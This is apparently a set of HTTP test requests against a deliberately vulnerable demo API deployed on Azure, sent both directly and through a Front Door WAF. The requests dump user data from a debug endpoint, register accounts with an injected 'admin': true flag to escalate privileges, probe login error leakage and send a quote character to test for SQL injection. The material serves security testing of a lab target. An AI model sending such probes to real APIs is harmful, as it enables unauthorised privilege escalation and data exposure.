### Start fresh!

GET https://kvaesvampiinsecure.azurewebsites.net/createdb HTTP/1.1

### List the users

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1 HTTP/1.1

### List debug info on the users

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/_debug HTTP/1.1

































### Create a user

POST /users/v1/register HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testuser",
  "email": "testuser@kvaes.be",
  "password": "securepassword"
}

### Check if it worked

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/_debug HTTP/1.1



























### create an admin user

POST /users/v1/register HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testadmin",
  "email": "testadmin@kvaes.be",
  "password": "securepassword",
  "admin": true
}

### Check if it worked

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/_debug HTTP/1.1




































### List Users via FrontDoor

GET https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/_debug HTTP/1.1

### Create an admin user via FrontDoor

POST /users/v1/register HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testwafadmin",
  "email": "testwafadmin@kvaes.be",
  "password": "securepassword",
  "admin": true
}

### Check if it worked

GET https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/_debug HTTP/1.1


























### Login with wrong password (info leakage)

POST /users/v1/login HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testwafadmin",
  "password": "wrongpassword"
}


### Login with correct password

POST /users/v1/login HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testwafadmin",
  "password": "securepassword"
}






























### User details

GET https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/admin HTTP/1.1


### Let us see how it will react to adding a quote as user name...

GET https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/' HTTP/1.1